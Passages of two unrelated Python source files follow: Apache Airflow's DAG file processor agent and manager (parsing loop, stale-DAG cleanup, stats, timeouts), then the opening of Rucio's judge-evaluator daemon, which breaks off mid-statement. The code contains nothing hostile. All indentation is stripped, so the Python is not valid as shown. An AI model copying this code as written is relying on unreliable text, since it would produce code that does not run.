"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory=dag_directory,
max_runs=max_runs,
processor_timeout=processor_timeout,
dag_ids=dag_ids,
pickle_dags=pickle_dags,
signal_conn=signal_conn,
async_mode=async_mode,
)
processor_manager.start()
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
signal_conn: Optional[MultiprocessingConnection] = None,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
# signal_conn is None for dag_processor_standalone mode.
self._direct_scheduler_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn in to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hangs for-ever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync_mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode and self._direct_scheduler_conn is not None:
os.set_blocking(self._direct_scheduler_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if (
conf.get_mandatory_value('database', 'sql_alchemy_conn').startswith('sqlite')
and self._parallelism > 1
):
self.log.warning(
"Because we cannot use more than 1 thread (parsing_processes = "
"%d) when using sqlite. So we set parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = (
{
self._direct_scheduler_conn: self._direct_scheduler_conn,
}
if self._direct_scheduler_conn is not None
else {}
)
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
set_new_process_group()
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""
Detects DAGs which are no longer present in files
Deactivate them and remove them in the serialized_dag table
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info("DAG %s is missing and will be deactivated.", dag.dag_id)
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
for dag_id in to_deactivate:
SerializedDagModel.remove_dag(dag_id)
self.log.info("Deleted DAG %s in serialized_dag table", dag_id)
self.last_deactivate_stale_dags_time = timezone.utcnow()
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
max_callbacks_per_loop = conf.getint("scheduler", "max_callbacks_per_loop")
standalone_dag_processor = conf.getboolean("scheduler", "standalone_dag_processor")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._direct_scheduler_conn is not None and self._direct_scheduler_conn in ready:
agent_signal = self._direct_scheduler_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
if standalone_dag_processor:
self._fetch_callbacks(max_callbacks_per_loop)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
if self._direct_scheduler_conn:
self._direct_scheduler_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail, than it is deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (It only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal queue for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._add_callback_to_queue(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_files would delete zipped dags.
# Likewise DagCode.remove_deleted_code
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
def _print_stat(self):
"""Occasionally print out stats about how fast the files are getting processed"""
if 0 < self.print_stats_interval < time.monotonic() - self.last_stat_print_time:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = time.monotonic()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(~errors.ImportError.filename.in_(self._file_paths))
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path", "PID", "Runtime", "# DAGs", "# Errors", "Last Runtime", "Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = (now - processor_start_time) if processor_start_time else None
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge(f'dag_processing.last_run.seconds_ago.{file_name}', seconds_ago)
rows.append((file_path, processor_pid, runtime, num_dags, num_errors, last_runtime, last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append(
(
file_path,
pid,
f"{runtime.total_seconds():.2f}s" if runtime else None,
num_dags,
num_errors,
f"{last_runtime:.2f}s" if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None,
)
)
log_str = (
"\n"
+ "=" * 80
+ "\n"
+ "DAG File Processing Stats\n\n"
+ tabulate(formatted_rows, headers=headers)
+ "\n"
+ "=" * 80
)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration.total_seconds() if stat and stat.last_duration else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""Sleeps until all the processors are done."""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def _collect_results_from_processor(self, processor) -> None:
self.log.debug("Processor for %s finished", processor.file_path)
Stats.decr('dag_processing.processes')
last_finish_time = timezone.utcnow()
if processor.result is not None:
num_dags, count_import_errors = processor.result
else:
self.log.error(
"Processor for %s exited with return code %s.", processor.file_path, processor.exit_code
)
count_import_errors = -1
num_dags = 0
last_duration = last_finish_time - processor.start_time
stat = DagFileStat(
num_dags=num_dags,
import_errors=count_import_errors,
last_finish_time=last_finish_time,
last_duration=last_duration,
run_count=self.get_run_count(processor.file_path) + 1,
)
self._file_stats[processor.file_path] = stat
file_name = os.path.splitext(os.path.basename(processor.file_path))[0].replace(os.sep, '.')
Stats.timing(f'dag_processing.last_duration.{file_name}', last_duration)
def collect_results(self) -> None:
"""Collect the result from any finished DAG processors"""
ready = multiprocessing.connection.wait(
self.waitables.keys() - [self._direct_scheduler_conn], timeout=0
)
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = cast(DagFileProcessorProcess, self.waitables[sentinel])
self.waitables.pop(processor.waitable_handle)
self._processors.pop(processor.file_path)
self._collect_results_from_processor(processor)
self.log.debug("%s/%s DAG parsing processes running", len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing", len(self._file_path_queue))
@staticmethod
def _create_process(file_path, pickle_dags, dag_ids, callback_requests):
"""Creates DagFileProcessorProcess instance."""
return DagFileProcessorProcess(
file_path=file_path, pickle_dags=pickle_dags, dag_ids=dag_ids, callback_requests=callback_requests
)
def start_new_processes(self):
"""Start more processors if we have enough slots and files to process"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
# Stop creating duplicate processor i.e. processor with the same filepath
if file_path in self._processors.keys():
continue
callback_to_execute_for_file = self._callback_to_execute[file_path]
processor = self._create_process(
file_path, self._pickle_dags, self._dag_ids, callback_to_execute_for_file
)
del self._callback_to_execute[file_path]
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug("Started a process (PID: %s) to generate tasks for %s", processor.pid, file_path)
self._processors[file_path] = processor
self.waitables[processor.waitable_handle] = processor
def prepare_file_path_queue(self):
"""Generate more file paths to process. Result are saved in _file_path_queue."""
self._parsing_start_time = time.perf_counter()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
# Sort the file paths by the parsing order mode
list_mode = conf.get("scheduler", "file_parsing_sort_mode")
files_with_mtime = {}
file_paths = []
is_mtime_mode = list_mode == "modified_time"
file_paths_recently_processed = []
for file_path in self._file_paths:
if is_mtime_mode:
try:
files_with_mtime[file_path] = os.path.getmtime(file_path)
except FileNotFoundError:
self.log.warning("Skipping processing of missing file: %s", file_path)
continue
file_modified_time = timezone.make_aware(datetime.fromtimestamp(files_with_mtime[file_path]))
else:
file_paths.append(file_path)
file_modified_time = None
# Find file paths that were recently processed to exclude them
# from being added to file_path_queue
# unless they were modified recently and parsing mode is "modified_time"
# in which case we don't honor "self._file_process_interval" (min_file_process_interval)
last_finish_time = self.get_last_finish_time(file_path)
if (
last_finish_time is not None
and (now - last_finish_time).total_seconds() < self._file_process_interval
and not (is_mtime_mode and file_modified_time and (file_modified_time > last_finish_time))
):
file_paths_recently_processed.append(file_path)
# Sort file paths via last modified time
if is_mtime_mode:
file_paths = sorted(files_with_mtime, key=files_with_mtime.get, reverse=True)
elif list_mode == "alphabetical":
file_paths = sorted(file_paths)
elif list_mode == "random_seeded_by_host":
# Shuffle the list seeded by hostname so multiple schedulers can work on different
# set of files. Since we set the seed, the sort order will remain same per host
random.Random(get_hostname()).shuffle(file_paths)
files_paths_at_run_limit = [
file_path for file_path, stat in self._file_stats.items() if stat.run_count == self._max_runs
]
file_paths_to_exclude = set(file_paths_in_progress).union(
file_paths_recently_processed, files_paths_at_run_limit
)
# Do not convert the following list to set as set does not preserve the order
# and we need to maintain the order of file_paths for `[scheduler] file_parsing_sort_mode`
files_paths_to_queue = [
file_path for file_path in file_paths if file_path not in file_paths_to_exclude
]
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path,
processor.start_time.isoformat(),
)
self.log.debug("Queuing the following files for processing:\n\t%s", "\n\t".join(files_paths_to_queue))
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(
num_dags=0, import_errors=0, last_finish_time=None, last_duration=None, run_count=0
)
self._file_path_queue.extend(files_paths_to_queue)
def _kill_timed_out_processors(self):
"""Kill any file processors that timeout to defend against process hangs."""
now = timezone.utcnow()
processors_to_remove = []
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, killing it.",
file_path,
processor.pid,
processor.start_time.isoformat(),
)
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove after Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
# Clean up processor references
self.waitables.pop(processor.waitable_handle)
processors_to_remove.append(file_path)
# Clean up `self._processors` after iterating over it
for proc in processors_to_remove:
self._processors.pop(proc)
def max_runs_reached(self):
""":return: whether all file paths have been processed max_runs times"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._num_run < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if pids_to_kill:
kill_child_processes_by_pids(pids_to_kill)
def emit_metrics(self):
"""
Emit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = time.perf_counter() - self._parsing_start_time
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge(
'dag_processing.import_errors', sum(stat.import_errors for stat in self._file_stats.values())
)
@property
def file_paths(self):
return self._file_paths
|
evaluator.py | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2017
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2016-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
"""
Judge-Evaluator is a daemon to re-evaluate and execute replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from datetime import datetime, timedelta
from re import match
from random import randint
from six import iteritems
from sqlalchemy.exc import DatabaseError
from sqlalchemy.orm.exc import FlushError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, DataIdentifierNotFound, ReplicationRuleCreationTemporaryFailed
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import re_evaluate_did, get_updated_dids, delete_updated_did
from rucio.core.monitor import record_counter
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def re_evaluator(once=False):
"""
Main loop to check the re-evaluation of dids.
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_dids = {} # {(scope, name): datetime}
# Make an initial heartbeat so that all judge-evaluators have the correct worker number on the next try
live(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread, older_than=60 * 30)
start = time.time() # NOQA
# Refresh paused dids
paused_dids = dict((k, v) for k, v in iteritems(paused_dids) if datetime.utcnow() < v)
# Select a bunch of dids for re evaluation for this worker
dids = get_updated_dids(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=100,
blacklisted_dids=[key for key in paused_dids])
logging.debug('re_evaluator[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(dids)))
# If the list is empty, sent the worker to sleep
if not dids and not once:
logging.debug('re_evaluator[%s/%s] did not get any work (paused_dids=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_dids))))
graceful_stop.wait(30)
else:
done_dids = {}
for did in dids:
if graceful_stop.is_set():
break
# Check if this did has already been operated on
if '%s:%s' % (did.scope, did.name) in done_dids:
if did.rule_evaluation_action in done_dids['%s:%s' % (did.scope, did.name)]:
logging.debug('re_evaluator[%s/%s]: evaluation of %s:%s already done' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
delete_updated_did(id=did.id)
continue
else:
done_dids['%s:%s' % (did.scope, did.name)] = []
try:
start_time = time.time()
re_evaluate_did(scope=did.scope, name=did.name, rule_evaluation_action=did.rule_evaluation_action)
logging.debug('re_evaluator[%s/%s]: evaluation of %s:%s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name, time.time() - start_time))
delete_updated_did(id=did.id)
done_dids['%s:%s' % (did.scope, did.name)].append(did.rule_evaluation_action)
except DataIdentifierNotFound as e:
delete_updated_did(id=did.id)
except (DatabaseException, DatabaseError) as e:
if match('.*ORA-00054.*', str(e.args[0])):
